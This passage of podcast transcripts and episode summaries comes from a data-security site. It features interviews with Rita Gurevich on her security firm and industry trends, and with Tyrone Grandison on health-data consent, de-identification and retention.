Rita Gurevich: That’s a great question. So I’ve learned that you have to listen more than you speak. You’re going to learn a lot through osmosis, just by being in a room where the conversation is happening. You’re just going to learn and get better. Sometimes, it’s just echoing a common opinion or a common sentiment that the person on the other side of the table has, and reaffirming that you’ve also experienced the same problem that they’re sharing, or you’ve seen it somewhere else, or you’ve solved that problem with a peer of theirs. So I think that learned confidence isn’t necessarily about having memorized a specific compliance requirement or a specific way of doing some task. It’s more about thinking things through logically. And if you don’t know, it’s okay not to know. Just make sure your follow-up and follow-through are there. No one expects experts. Data security and cybersecurity as a whole is a very new area. Everyone is learning as we go; it’s all common knowledge. What matters is whether you can think of solutions in a creative way and solve the problems that people are having. And sometimes it’s not reinventing the wheel. Sometimes it’s solving an existing problem in a smarter, more scalable, and more efficient way. I’ve learned that by failing sometimes. You don’t have to come up with an idea that no one has thought of. You just have to come up with a more practical way of doing things sometimes. And the other bit of advice, and something that I really believe in, is becoming kind of a master of some things. So, instead of the "jack-of-all-trades," focusing in on something and becoming really good at it, and, you know, that's what I did. So I call Sphere a cybersecurity company, but we're actually pretty niche. We focus on internal threats, and we specifically focus on putting controls on your data, your systems, and your assets. So, it's a very narrow piece of the pie when you look at cybersecurity as a whole, but that allows my team, and that allows me, to train new personnel really, really effectively, because you can hone in on very specific topics. You can give real-world examples of very specific things, and people can really start to grasp, you know, the complicated challenges that we're solving, but also think of them in a more simplistic, logical way.
You know, all these technology challenges, from data breaches to hackers and all that, feel very complicated. They really do, but when you break them apart and remove the technical jargon, the problems and the reasons these things are happening are not overly technically challenging. A lot of them are profit driven, they're people driven. They're not necessarily about, you know, the right configuration of a tool within a specific domain. It's a much more systematic issue. So, I think when you start to gain an understanding of this space, you start to figure that out pretty quickly.
Cindy Ng: On top of starting your business at a really young age, there aren't a whole lot of females in the industry. We talk a lot about women in tech, but I wonder, how can men join the conversation, because they coexist with us on this planet? I wanted to hear your perspective on how we can enlist men as allies in our industry.
Rita Gurevich: I definitely get asked a lot about this topic, because, you're right, there are not a lot of women in tech, and to be honest there are not a lot of women CEOs either, so when you merge women, tech, and CEO, I guess I'm a little bit of an anomaly, but I'm hoping that's not for very long. I think honestly we need to stop caring that the person joining the conversation is a woman; then we'll know there's going to be equality, because we're not forcing that distinction. And I think more and more women are getting involved in technology early on. Technology is part of nearly every child's life right now, independent of gender, and I think that naturally, maybe over the next 10 to 20 years, it's going to cause dramatic shifts in ratios in the tech workplace.
And I really think that tech is going to be an early adopter of inclusiveness of women and inclusiveness across the board. Technology is very interesting because it's analytical thinking, it's problem solving, it's researching, definitely mixed in sometimes with creativity and out-of-the-box thinking. Maybe I'm partial, but I think these are natural traits of women, and in the end, if you work for a big company, managers want successful teams, and their managers want successful orgs, and women will rise through the ranks as there are just going to be more of them in the running.
Unfortunately, I think that other industries are not as fortunate. And I bring up two specific women whenever I talk about this topic.
One I met on a panel I was on, "Women In Engineering." She's a civil engineer at a big company, and she works a lot with construction companies. Once she's on a job site, they assume that she's a secretary, and even when she explains herself they just don't listen to her and won't take direction from her. She's expressed how difficult it is for her to advance, and these are challenges that have nothing to do with brains, with smarts, with experience. It's really a people problem, and I don't envy that. You know, I struggle with even thinking about how you adjust that mentality.
Another example is a woman that I met as part of the EY Entrepreneur Of The Year Program, which I was recognized in as well. She owns a liquor company, and half of her job is in a warehouse where the employees are chain-smoking; they're, you know, a bunch of old men, no offense to old men, but they kind of act like they've never seen a woman with any level of authority before. And it's sad. You know, I'm very fortunate that I work in an industry where technology is definitely going to be on the forefront of diversity and inclusiveness, but you look at some of these other industries, and you hope that they'll follow suit, hopefully sooner rather than later, as more women in general are joining the workforce and taking on careers that aren't traditionally careers that women participate in.
Cindy Ng: So, let's go back to the technology, and you work with many different sectors, retail, energy, hospitals, financial. Can you speak to the different industries and what their concerns are regarding security?
Rita Gurevich: I think this is the first time ever that concerns are not as industry specific as they used to be. And I think that's due to the times that we live in. I mean, everybody now cares about cybersecurity; people are starting to understand how it affects them personally and how it affects them professionally. You know, a year ago, nobody in my family understood what I did for a living, and now even my grandmother gets it. Anytime there's a breach in the news or on the front page of the paper, she'll call me and say, "Too bad they didn't have Sphere." It's pretty cute, but I think that just shows that the concept of data breaches and cybersecurity is part of everybody's lives. The expectation is that everybody's going to be involved, and anybody is up for grabs to be affected. And I think the Equifax breach is just a prime example. I mean, it was on every news channel, and we all know that half the country was affected by it. You think about how many people had to, you know, check their credit or react to that event. It's becoming just common sense that every company, every industry needs to focus on this.
So, sometimes I think that the challenges experienced within individual industries are scarier than others. We all know about financial firms. They've been the targets and on the front page of papers for a long time. But if we look at hospitals, for example, that can be really scary. So, I'll give you another anecdote, I love these examples. I use a lot of them, but the one that specifically comes to mind was a panel at an event that we sponsored, and we had a group of CISOs at the front of the room. One of them was a woman, the CISO of a big hospital network, and she explained ransomware and how it affects hospitals differently than, you know, a bank or somewhere else. And she explained, "Imagine you're a patient about to go into surgery, and the hospital has an attack, and your patient files are now locked down, and the hospital has to pay ransom in order to get them back, and you're about to go into surgery, and the doctors need these records." It sounds like a very sci-fi example, and you think, "that doesn't really happen," but it really happens, and that's how it happens. It's not even just that our wallets are being impacted, it's our health, it's our lives, it's how we receive healthcare that's affected by cyber crime. It is so close to home for every single person in the world that I think the industry is just going to massively change. And I think we're gonna start to see that almost immediately because it's just such commonplace knowledge. It's industry wide, it's not industry specific, and, again, it's not just our wallets that are affected, it's our health.
Cindy Ng: A lot of the problem, previously and maybe even now, is that IT pros are having trouble connecting with the C-suite, and I'm wondering, after the breach, after the ransom, where are CEOs and others in the C-suite getting more involved in cyber security? What are your recommendations when you're speaking with the C-suite versus the IT pros, because you're kind of a conduit between the two different channels?
Rita Gurevich: I think the C-suite, primarily the CISO, has a very different job now than they used to. Honestly, I don't envy CISOs right now. You have a bad breach, your whole background is going to be on the front page of the paper. It's not just that your company will get fined. Your background, your history, where you worked, what your college major was is going to be out there for everyone to dissect and criticize, okay? That is not a position that most people are comfortable with. So I think CISOs now more than ever recognize that the job they chose and the career they chose has to be proactive. They have to be on the front lines. They have to think about things in smarter ways. So, I think that we're going to see a shift in CISOs where it's going to be the best of the best of the best. I think that a lot of companies took for granted the need for highly skilled leaders within information security, and they're starting to see what happens to companies once a major attack occurs, and I think that is going to change.
Now, the other challenge, I think, with companies is that many of them placed one person at the helm, and they started to build out these teams, and honestly, it's not enough. There are way too many threats. There are way too many options. There are honestly way too many vendors potentially offering options for one person to be making those decisions. So, what I see happening is that there are going to be subject-matter CISOs across the company, where there are many people with that title who become experts in very specific domains. So, I think that information security, in terms of employee count, is eventually going to exceed general IT, because making sure that internal people aren't doing things they shouldn't be doing, and doing everything in your power to prevent anybody on the outside from getting in who shouldn't be getting in, is becoming more of a priority than uptime and availability of systems.
Cindy Ng: It's been said that information security is really just compliance, not security. Has that notion been thrown out the window now that people have realized how serious information security is?
Rita Gurevich: That's a great question. I'm gonna give you another story. I was on the phone with a CISO, the CISO of one of the largest manufacturing companies, and we were talking about his agenda for the year. He recently started at that company and was told that his mandate was compliance, and maybe this is because the company struggled with compliance in the past, but he immediately said, if my mandate is compliance, I don't want the job. You know, that is not what I should be focusing on. And the challenge with focusing solely on compliance, as he put it, is that it actually leaves you more exposed. Compliance is about a checklist, and often that checklist is very subjective, and often the people who are verifying whether you've completed that checklist range in levels of expertise. I mean, we have customers from the 1,000-person shop all the way to the 100,000-person shop, and we as outsiders can see that the caliber of the people coming in from the regulatory bodies to check on them is vastly different. Just because you've checked the box, it doesn't mean that you have good security. And it's good security that's going to minimize your risk. And you have to think about security first. If you think good security will drive compliance and not the other way around, you're still going to achieve the goal of good compliance, but you're also going to put the right preventative controls in place to minimize a data breach or some other cybercrime.
Cindy Ng: Let's talk more about your company, SPHERE. What is the mission of your company?
Rita Gurevich: The mission of SPHERE is to help companies take control of their data, their systems, and their assets. What that means is giving them the visibility that they need: understanding what they have, what they need to protect, and how they need to protect it. Along with that, we give them a SWAT-team approach, helping them remediate issues that they have, and we also put tooling in place to allow them to manage their environments effectively, in house. A lot of companies have no idea where to start in terms of looking at data governance. They have no idea what needs to be remediated or fixed, or how IAM workflows work. Or they have no idea what threats privileged accounts pose for their organizations because they don't have threat-level visibility. And once we get them the visibility, a lot of times they need a one-time SWAT-team approach to clean up the environment. And that's something that we also do. We've also partnered with different vendors, and obviously Varonis is one of the most strategic partners we've partnered with. We offer tooling to help people manage their environment on their own, with their own resources, long term. We also have our own solution called SPHEREboard, which integrates with Varonis along with a handful of other best-of-breed technologies to provide a single pane of glass into your data, your systems, and your assets.
Cindy Ng: So, you don't curate a list of vendors for your different clientele to meet their needs? It's more like here's what we know all companies need. Here's what we can provide for you. Because sometimes your clients don't know that certain technologies might exist, you're essentially giving them one panel of "here's everything you need to know."
Rita Gurevich: Yeah, that's exactly right, and we're by no means a VAR where we have a portfolio of, you know, 100 different products, and then we switch them out as we need to. We really invest in the relationships that we've built with our partner network and with the companies that we've integrated our solution with, and that's important because you need to have consistency. And if you want a solution to be sticky, it has to be relevant, it has to answer the right questions, and there has to be a history of that company doing things the right way. There's going to be a lot of disruption within this industry, and there's going to be a lot of companies coming into the space. They're offering really cool widgets and gadgets and all that good stuff that probably aren't going to be around in a year or two. That's just the nature of entrepreneurship and innovation, but there are going to be plenty that come around and stick around. The relationships that we've formed and the partners that we work with are ones that we've been working with now for a really long time, way before anyone even thought something like Equifax could happen. So, we've been solving this problem way before it was cool, and we're gonna continue to offer that, and be more innovative, and continue to solve problems for our customers.
Cindy Ng: Have you ever found, after speaking with, say, 10 vendors, that you realize, "Oh, we're missing X, Y, and Z products, and I'm gonna go find a vendor to see if there's anyone I can work with"?
Rita Gurevich: Yeah, at times, but I think it happens a little bit more naturally than that. I think that it's first about the problem statement, so I'll give you an example. The last area that we've added to our portfolio more officially is privileged access management, and, you know, our focus was, of course, on the traditional challenges with password vaulting and such, but really from a SPHERE perspective, we were noticing challenges in deploying those solutions: understanding what privileged accounts exist in my environment, whether it's in my Unix environment, on my Windows servers, my databases, etc., and who owns those accounts, and who do I need to educate on a new way of working? So, it's not necessarily about the products that will, you know, do password vaulting, or record sessions, or whatever the tools may do, it's more about the people and the process, and all the work that needs to be done ahead of that. So, I think our expertise comes with that. Now, there's no doubt in my mind that CyberArk is the leader in that space, and we decided to partner with CyberArk because of that. But, that being said, our solution for privileged access management is not just to recommend a tool, it's to create a process, to create an end-to-end solution that includes a one-time remediation effort. That maybe includes process change, maybe includes training, maybe includes, you know, health checks, and then, of course, there's also the software element of this. Most companies cannot manage this manually. You need the right tooling, so there are definitely tooling recommendations. So, I think when you look at the problem end-to-end, the products and the vendors we decide to work with for specific initiatives naturally fall into place.
Cindy Ng: What are upcoming plans for Sphere?
Rita Gurevich: Definitely growth in mind. I get bored easily, so growth strategy is always at the forefront of my mind. What we're focusing on is a couple of different areas. The first is geographical expansion. We opened up our London office this year. That's going really well, and essentially we're just replicating the message here out there. There are all sorts of requirements out there in terms of GDPR, and just overall data security, that companies there need just as much as they need here. Also, our products. SPHEREboard is our baby. We came out with it about two years ago, and it's a culmination of years of experience of being in the field from a services perspective, so we're building more connectors, having more tools feed into it, and pumping out all sorts of really cool analytics for our customers to leverage. So, those are the two areas that we're focusing on, and you're gonna see a lot about SPHERE in the next year.
Cindy Ng: Sounds great. Thanks Rita.
Critical systems once operated by humans are now becoming more dependent on code and developers. There are many benefits to machines and automation such as increased productivity, quality and predictability.
But when websites crash, 911 systems go down, or radiation-therapy machines kill patients because of a software error, it’s vital that we rethink our relationship with code, as well as the moral obligations of machines and humans.
Should developers who create software that impacts humans be required to take a ‘do no harm’ ethics training? Should we begin measuring developers by the functionality they create as well as the security and moral frameworks they’re able to provide?
Other articles discussed:
Panelists: Cindy Ng, Kilian Englert, Kris Keyser, Mike Buckbee
Outlined in the National Cyber Security Centre’s “Cyber crime: understanding the online business model,” the structure of a cybercrime organization is in many ways a lot like a regular tech startup. There’s a CEO, developer, and if there are enough funds, an IT department.
However, one role outlined in an infographic on page nine of the report was a surprise, because it does not exist in legitimate businesses. This role is known as a “money mule.” Vulnerable individuals are often lured into these roles with titles such as “payment processing agents” or “money transfer agents.”
But when “money mules” apply for the job, and even after they get the job, they’re not aware that they are being used to commit fraud. Therefore, if the cybercriminals get caught, “money mules” might also get in trouble with law enforcement. A “money mule” can expect a freeze on his bank account, face possible prosecution, and might be responsible for repaying the losses. It might even end up on his permanent record.
Other articles and threads discussed:
Panelists: Cindy Ng, Mike Buckbee, Kilian Englert, Mike Thompson
By now, we’re all aware that many of the platforms and services we use collect and store information about our data usage. After all, they want to provide us with the most personalized experience.
So when I read that an EU Tinder user requested information about her data and was sent 800 pages, I was very intrigued by the comment from Luke Stark, a digital technology sociologist at Dartmouth College: “Apps such as Tinder are taking advantage of a simple emotional phenomenon; we can’t feel data. This is why seeing everything printed strikes you. We are physical creatures. We need materiality.”
He is on to something. We don’t usually consider archiving stale data until we’re out of space. It is often through printing photos, docs, spreadsheets, and pdfs that we would feel the weight and space consuming nature of the data we own.
Stark’s description of data’s intangible quality led me to wonder how weightless data impacts how we think about data security.
For instance, when there’s a power outage, some IT departments aren’t deemed important enough to be on a generator. Or when Infosec is often seen as a compliance requirement, not as security. Another roadblock security pros often face is when they report a security vulnerability – it’s not usually well received.
Podcast panelists: Cindy Ng, Mike Buckbee, Kilian Englert, Mike Thompson
While some regard Infosec as compliance rather than security, veteran pentesters Sanjiv Kawa and Tom Porter believe otherwise. They have deep expertise working with large enterprise networks, exploit development, defensive analytics and I was lucky enough to speak with them about the fascinating world of pentesting.
In our podcast interview, we learned what a pentesting engagement entails, assigning budget to risk, the importance of asset identification, and so much more.
Regular speakers at Security Bsides, they have a presentation on October 7th in DC, The World is Y0ur$: Geolocation-based Wordlist Generation with Wordsmith.
Ofer Shezaf is Director of Cyber Security at Varonis. A self-described all-around security guy, Ofer is in charge of security standards for Varonis products. He has had a long career that includes most recently a stint at Hewlett-Packard, where he was a product manager for their SIEM software, known as ArcSight. Ofer is a graduate of Israel's elite Technion University.
In this second part of the interview, we explore ways to improve data security through security by design techniques at the development stage, pen testing, deploying Windows 10s, and even labeling security products!
Ofer Shezaf is Director of Cyber Security at Varonis. A self-described all-around security guy, Ofer is in charge of security standards for Varonis products. He has had a long career that includes most recently a stint at Hewlett-Packard, where he was a product manager for their SIEM software, known as ArcSight. Ofer is a graduate of Israel's elite Technion University. In this first part of the interview, Ofer shares his thoughts on the changing threat landscape.
Dr. Tyrone Grandison has done it all. He is an author, professor, mentor, board member, and a former White House Presidential Innovation Fellow. He has held various positions in the C-Suite, including his most recent role as Chief Information Officer at the Institute for Health Metrics and Evaluation, an independent health research center that provides metrics on the world's most important health problems.
In our interview, Tyrone shares what it’s like to lead a team of forty highly skilled technologists who provide the tools, infrastructure, and technology that enable researchers to develop statistical models, visualizations, and reports. He also describes his adventures wrangling petabytes of data, the promise and peril of our data economy, and what board members need to know about cybersecurity.
Cindy Ng: Oftentimes, the bottom line drives businesses forward, whereas your institute is driven by helping policymakers and donors determine how to help people live longer and healthier lives. What is your involvement in ensuring that that vision is sustained and carried through?
Tyrone Grandison: Perfect. So I lead the technology team here, which is a team of 40 really skilled data scientists, software engineer, system administrators, project and program managers. And what we do is that we provide the base, the infrastructure. We provide tools and technologies that enable researchers to, one, ingest data. So we get data from every single country across the world. Everything from surveys to censuses to death records. No matter how small or poor or politically closed a country is. And we basically house this information. We help the researchers develop statistical models. Like, very sophisticated statistical models and tools on them that make sense of the data. And then we actually put it out there to a network of over 2,400 collaborators.
And they help us produce what we called the Global Burden of Disease that, you know, shows what in different countries of the world is the predominant thing that is actually shortening lives in particular age groups, for particular genders and all demographic information. So, now people can, if they wanted to, do an apples-to-apples comparison between countries across ages and over time. So, if you wanted to see the damage done by tobacco smoking in Greece and compare that to the healthy years lost due to traffic injuries in Guatemala, you can actually do that. If you wanted to compare both of those things with the impact of HIV in Ghana, then that's now possible. So our entire thing is, how do we actually provide the technology base and the skills to, one, host the data, support the building of the models and support the visualization of it. So people can actually make these comparisons.
Cindy Ng: You're responsible for a lot, so let's try to break it down a bit. When you receive a bunch of data sets from various sources, take me through what your plan is for them. Last time we spoke, we spoke about obesity. Maybe that's a good one that everyone can relate to?
Tyrone Grandison: Sure. So, say we get an obesity data set from one of the health entities within a particular country. It goes through a process where we have a team of data analysts look at the data and extract the relevant portions of it. We then put it into our ingestion pipeline, where we vet it. Vet it in terms of what it can apply to. Does it apply to specific diseases? Obviously, it's going to apply to a specific country. Does it apply to a particular age group and gender? From that point on, we then include it in models. And we have our modeling pipeline that does everything from estimating the number of years lost from obesity in that particular country, to, as I mentioned before, seeing whether that particular statistic that we got from that survey is relevant or not.
From there, we basically use it to figure out, okay, well what is the overall picture across the world for obesity? And then, we visualize it and make it accessible. And provide people with the ability to tell stories on it with the hope that at someone point, a policymaker or somebody within the public health institute within a particular country is gonna see it and actually use it in their decision making in terms of how to actually improve obesity in their particular country.
Cindy Ng: And when you talk about relevance and modeling, people say in the industry that there is a lot of unconscious bias. How do you reconcile that? And how do you work with certain factors that people think are controversial? For instance, people have said that using a body mass index isn't accurate.
Tyrone Grandison: That's where we actually depend a lot on the network of collaborators that we spoke about. Not only do we have a team that has been doing epidemiology and advancing population health metrics for, you know, over two decades. We also depend upon experts within each particular country, once we produce, like, you know, the first estimates based upon the initial models, to actually look at these estimates and say, "Nope. This does not make sense. We need to actually adjust your model to factor in that same unconscious bias." Or to remove something the model says we're seeing but that the model may need to be tweaked on or is wrong about. It all boils down to having people vet what the models are doing.
So, it's more along the lines of how do you create systems that are really good at human computation. Marrying the things that machines are good with and then putting in a step there that forces a human to verify and kind of improve the final estimate that you want to actually want to produce.
Cindy Ng: Is there a pattern that you've seen over time where, time and time again, the model doesn't account for X, Y, and Z? And then the human gets involved and figures out what's needed and provides the context? Is there a particular concept or idea that you've seen?
Tyrone Grandison: There is. And there is to the point where we basically have included it in our initial processing. So, there is this concept, right. The idea of a shock. Where a shock is an event that models cannot predict and it may have wide ranging impact essentially on what you're trying to produce. So, for example, you could consider the earthquake in Haiti as a shock. You could consider the HIV epidemic as a shock. Every single country in any one given year may have a few shocks depending upon what the geolocation is that you're looking at. And again, the shocks are different and we are really grateful to the collaborative network for providing insight and telling us that, "Op, this shock is actually missing from your model for this particular location, for this particular population segment."
Cindy Ng: It sounds like there's a lot of relationship building, too, with these organizations because sometimes people aren't so forthcoming with what you need to know.
Tyrone Grandison: So, I mean, it's relationship building. The work that we've been doing here has been going on for 20 years. So, imagine 20 years of work just producing this Global Burden of Disease. And then probably another decade or two before that just building the connections across the world. Because our Director has been in this space for quite a while now. He's worked everywhere from the WHO to MIT doing this work. So, the connections there and the connections from the executive team have been invaluable in making sure that people actually speak candidly and honestly about what's going on. Because we are the impartial arbiters of the best data on what's happening in population health.
Cindy Ng: And it certainly helps when it's not driven by the bottom line, when the most important thing is to improve everyone's health outcomes. What are the challenges of working with disparate data sets?
Tyrone Grandison: So, the challenges are the same everywhere, right? The challenges all relate to, okay, well, are we talking about the same things? Right. Are we talking the same language? Do we have the same semantics? Basic challenge. Two is, well, does the data have what we need to actually answer the question? Not all data is relevant. Not all data is created equal. So, just figuring out what is actually going to give us insight into, you know, the question as to how many years you lose for a particular disease. And the third thing, which is pretty common to, you know, every field that is trying to push into the open data area: do we have the right facets in each data set to actually integrate them? Does it make sense to integrate them at all? So, the challenges are not different from what the broader industry is facing.
Cindy Ng: You've developed relationships for over 20 years. Back then, we weren't able to assess so many different, I'm guessing billions and trillions of data sets. Have you seen the transition happen? And how has that transition been difficult? And how has it made your lives so much better?
Tyrone Grandison: Yeah. So, the Global Burden of Disease actually started on a cycle where, you know, when we considered that we had enough data to actually make those estimates, we would produce the next Global Burden of Disease. Right, and starting this year we just moved to an annual cycle. So, that's the biggest change. The biggest change is because of the wealth of data that exists out there. Because of the advances of technology, now we can actually increase the production of this data asset, so to speak. Whereas before, it was a lot of anecdotal evidence. It was a lot of negotiation to get the data that we actually need. Now, there are far more open data sets. So, lots more that's actually available.
There's a willingness, due to past demonstrations of the power of this data, for governments and people to actually provide and produce it, because they know that they can actually use it. It's the technology hand-in-hand with the cultural change that's happened. Those have been the biggest changes.
Cindy Ng: What have you learned about wrangling petabytes of data?
Tyrone Grandison: A lot. In a nutshell, it's very difficult, and if I were to give advice to people, I would start with: what's the problem you're trying to solve? What's the mission you're trying to achieve? And figure out what the things are that you need in your data sets that would help you answer that question or mission. And finally, as much as possible, stick with a standardize-and-simplify kind of methodology. Leverage a standard infrastructure and a standard architecture across what you are doing. And make it dead simple, because if it's not standard or simple, then getting to scale is really difficult. And scale meaning processing tens or hundreds of petabytes worth of data.
Cindy Ng: There are a lot of health trackers, too, where they're trying to gather all sorts of data in hopes that they might use it later. Is that a recommended best practice approach for figuring your solution or the problem out? Because, you know, what if you didn't think of something and then a new idea popped into your head? And then there's a lot of controversy with that. What is your insight...
Tyrone Grandison: The controversy is, in my view, actually very real. One, what is the level of data that you are collecting, right? So, at IHME, we're lucky to be looking at population-level data. If you're looking at or collecting individual records, then we have a can of worms in terms of data ownership, data privacy, data security. Right. And, especially in America, what you're referring to is the whole argument around secondary use of health data. The concern or issue is, just like with HIPAA, the Health Insurance Portability and Accountability Act, you're supposed to have data for one person for a specific purpose and only that purpose. The issue or concern, like you just brought up, is, one, a lot of companies actually view data that is created or generated on a particular individual as being their own property. Their own intellectual property. Which you may or may not agree with.
In the current model, the current infrastructure, there's no checklist that says the person who this data is about should actually have a say in this. Right. And I can just say, like, personally, I believe that if the data is about you, that data's created by you, then technically you should own it. And the company should be a good steward of the data. Right. Being a good steward simply means that you're going to use the data for the purpose that you told the owner you're going to use it for. And that you will destroy the data after you finish using it. If you come up with a secondary use for it, then you should ask the person again, do they want to actually participate in it?
So, the issue that I have with it is basically the disenfranchisement of the data owner. The neglect of consent, or even asking for it, when the data is used for a secondary function or a secondary purpose. And the fact that there are inherent things in that scenario, with that question, that are still unresolved and are just assumed to be true, that people just need to look at.
Cindy Ng: When you say when the project is over, how do you know when the project is over? Because I can, for instance, write a paper and keep editing and editing and it will never feel completed and done.
Tyrone Grandison: Sure. So, it's... I mean, put it this way. If I say to the people that are involved in a particular study, or that gave me their data, that I want to use this data to test a hypothesis, and the hypothesis is that drinking a lot of alcohol will cause liver damage. Okay, obvious. And I, you know, publish my findings on it. It gets revised. At the very end, there has to be a point where either the paper is published in a journal somewhere or not. Right. I'm assuming. If that's the case, and, you know, I publish it and I find out that, hey, I can actually use the same data to figure out the effects of alcohol consumption on some other thing, that is a secondary purpose that I did not have an agreement with you on, and so I should actually ask for your consent on that. Right.
So, the question is just not when is the task done, but when have I actually accomplished the purpose that I negotiated and asked you to use your data for.
Cindy Ng: So, it sounds like that's the really best practice when you're gathering or using someone's personal data. That that's the initial contract. If there is a secondary use that they should also know about it. Because you don't want to end up in a situation like Henrietta Lacks and they're using your cells and you don't even know it, right?
Tyrone Grandison: Yup. But Henrietta Lacks actually is a good example. It highlights the current practices of the industry. Right. And again, luckily, public health does not have this issue because we have aggregated data on different people. But in the general healthcare scenario, where you do have individual health records, what companies are doing, and what they did in the Henrietta Lacks case, was they may have actually specified in some legal document that, "Hey, we're gonna use your information for X, and X is the purpose." And they either make X so broad, so general, that it encompasses every possible thing you can imagine, or they basically say, "We're going to do a really specific purpose and anything else that we find." And that is now the common practice within the field. Right?
And to me, the heart of that seems very deceptive. Right. Because you're saying to somebody, you know, we have no idea what we're going to do with your data, we want access to do it, and, oh, we assume that you're not going to own it. We assume that any profits or anything that we get from it is going to be ours. Do you see how the model itself just seems perverse? It's tilted or veered towards how do we actually get something from somebody for free and turn it into an asset for my business, where I have carte blanche to do what I want with it. And I think that discussion has not happened seriously in the healthcare industry.
Cindy Ng: I'm surprised that businesses haven't approached your institution for assistance with this matter. It just sounds like it would make total sense, because I'm assuming that all of your data perhaps has all the names and PHI stripped.
Tyrone Grandison: We don't even get to that level at this point.
Cindy Ng: Oh, you don't even...
Tyrone Grandison: It's information on a generalized level. So there are multiple techniques that you can actually use to, let's say, protect privacy for people. One would be just suppression. Okay, so I suppress the things that I call or consider PII. The other is generalization. Right. So, it's basically, I'm going to look at or get information that is not at the most granular level, but at the level above it. Don't look at you and all your peers; you go a level above that and say, "Okay. Well, let's look at everyone that lives in a particular zip code or a particular state or country." That way, you have protection by hiding in a crowd. You can't really identify one particular person in the data set itself. So, at IHME we don't have the PHI/PII issue because we work on generalized data sets.
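[Editor's note: a minimal sketch, in Python, of the two techniques Tyrone describes here, suppression and generalization. The records, field names, and bucket sizes below are hypothetical and exist only to illustrate dropping direct identifiers and coarsening quasi-identifiers so that individuals hide in a crowd.

# Suppression: drop fields treated as direct identifiers (PII).
# Generalization: replace granular values with coarser ones (zip prefix, age bucket).
records = [
    {"name": "Ann Lee", "zip": "98105", "age": 34, "diagnosis": "flu"},
    {"name": "Bo Chen", "zip": "98107", "age": 36, "diagnosis": "flu"},
]

PII_FIELDS = {"name"}  # hypothetical list of fields to suppress outright

def suppress(record):
    """Remove direct identifiers entirely."""
    return {k: v for k, v in record.items() if k not in PII_FIELDS}

def generalize(record):
    """Move quasi-identifiers one level up: 5-digit zip to a 3-digit prefix, exact age to a 10-year bucket."""
    out = dict(record)
    out["zip"] = record["zip"][:3] + "xx"
    decade = (record["age"] // 10) * 10
    out["age"] = f"{decade}-{decade + 9}"
    return out

deidentified = [generalize(suppress(r)) for r in records]
print(deidentified)
# Both records now share the zip prefix "981xx" and the age bucket "30-39",
# so neither individual stands out on those fields alone.

End of note.]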
Cindy Ng: You've held many different roles. You've been a CDO, a CIO, a CEO. Which role do you enjoy doing most?
Tyrone Grandison: So, any role that actually allows me to do two things. Like, one, create and drive the direction or strategy of an organization. And, two, enables me to help with the execution of that strategy to actually produce things that will positively impact people. The roles that I have been fond of so far would be CEO and CIO because at those levels, you basically also get to set what the organizational culture is, which is very valuable in my mind.
Cindy Ng: And since you've also been a board member, what do you think the board needs to know when it comes to privacy and cyber security?
Tyrone Grandison: First of all, I think it should be an agenda item that you deal with upfront and not after a breach or an incident. It should be something that you bake into your plans and into the product life cycle from the very beginning. You should be proactive in how you view it. The main thing I've noticed over time is that people do not pay attention to privacy, cyber security, cyber crime until, you know, after there is, and this is a horrible analogy, a dead body in the sea, so to speak. And then you start having reputational damage and financial damage because of it.
When, you know, thinking about the process, technology, people, and tools that would actually help you fix this from the very get-go would have saved you a lot of time. And, you know, there's the whole thought of both of these things, privacy and security, being cost centers: you don't see a profit from them. You don't see revenue being generated from them. And you only actually see the benefit, the cost savings, so to speak, after everyone else has been breached or damaged by an episode and you're not. Right. Yeah. It's about being a little bit more proactive upfront rather than reactive and, you know, after the fact.
Cindy Ng: But it's also been said that IT makes technology seem more complicated than it really is, and the board is unable to follow what IT is presenting, so they're confused, and there's not a series of steps they can follow. Or maybe IT asked for a budget for one thing one year and then wants some more money the next year. And as you said, it costs money. But do you also think that there's a value proposition that's not carried across in a presentation? How can the point be driven home then?
Tyrone Grandison: So, I mean, the biggest thing you just identified is the language barrier. The translation problem. So, I don't fundamentally believe that anyone, tech or otherwise, is purposely trying to sound complex. Or purposely trying to confuse people. It's just a matter of, you know, you have skilled people in a field or domain, whatever the domain is. So, if you went tomorrow and started talking to an oncologist or a water engineer, and they just went off and used a bunch of jargon from their particular fields, they're not trying to be overly complex. They're not trying to keep you from understanding what they're doing. But they've been studying this for decades. And they're just so steeped in it that that's their vocabulary.
So, the number one issue is just that, one, understanding your audience. Right. If you know that your audience is not tech or is from a different field or a different era in tech or is the board, and understanding the audience and knowing what their language is and then translating your language lingo into things that they can understand, I think that would go a long, long way in actually helping people understand the importance of privacy and cyber security.
Cindy Ng: And we often like to make the analogy that we should treat data like money. But do you think that data can potentially be more valuable than money, when attacks aren't financially driven but are instead out to destroy data? We react in a really different way, so I wanted to hear your thoughts on the analogy of data versus money.
Tyrone Grandison: Interesting. So, money is just a convenient currency. Right. To enable a trade. And money has been associated with giving value to certain objects that we consider important. So, I'm viewing data as something that needs to have a value assigned to it. Right. Which money is going to be that medium for. Right. Whether the money is actual physical money or it's Bitcoin. So, I don't see the two things being in conflict. Or the two things having a comparison between values. I just think that data is valuable. A chair is valuable. A phone is valuable. Money is just that medium that allows us to have one standard unit to compare the value between all those things.
Is data going to be more valuable than the current physical IT assets that a company has? Over time, I think, yes. Because the data that you're using, that you're hopefully going to be using, is going to be driving more, one, insights. More, hopefully, revenue. More creative uses of the current resources. So, the data itself is going to influence how much of the other resources you will actually acquire, or how much of the other resources you need to place in particular spots or instances, or allocate across the world. So, I see data as a good driving force for making these value-driven decisions. So, I think its importance versus the physical IT assets is going to increase over time. You can see that happening already. To say data is more valuable than cash, I'm not too sure that's the right question.
Cindy Ng: We've talked about the value of data, but what about data retention and migration? It's sort of dull, yet so important.
Tyrone Grandison: Well, multiple perspectives here. Data retention and migration is important for multiple reasons. Right. And the importance normally lies in risk. In minimizing the risk or the harm that can potentially be done to the owner of the data, or the subjects that are referenced in the data sets. Right. That's where the importance lies. That's why you have whole countries and states actually saying that they have a data retention policy or plan. And that means that after a certain time, either the stuff has to be gone, completely deleted, or be stored somewhere that is secure and not readily accessible.
And the whole premise of it is just like you assume for a particular period of time, that companies are going to need to use that data to actually accomplish a purpose that they specified initially, but then after that point, the risk or the potential harm of that becomes so high that you need to do something to reduce that risk. And that thing normally is a destruction or migration somewhere else.
Cindy Ng: What about integrating that data set with another, so probably a secondary use, but integrating it with other institutes? I hear that people want a one-health solution in terms of patient data, so that all organizations can access it. It's definitely a risk. But is that something that you think is a good idea, that we should even entertain? Or are we going to create a monster, where a single database that integrates everything and all the data is a bad solution, even though it's great for analytics and technology and use?
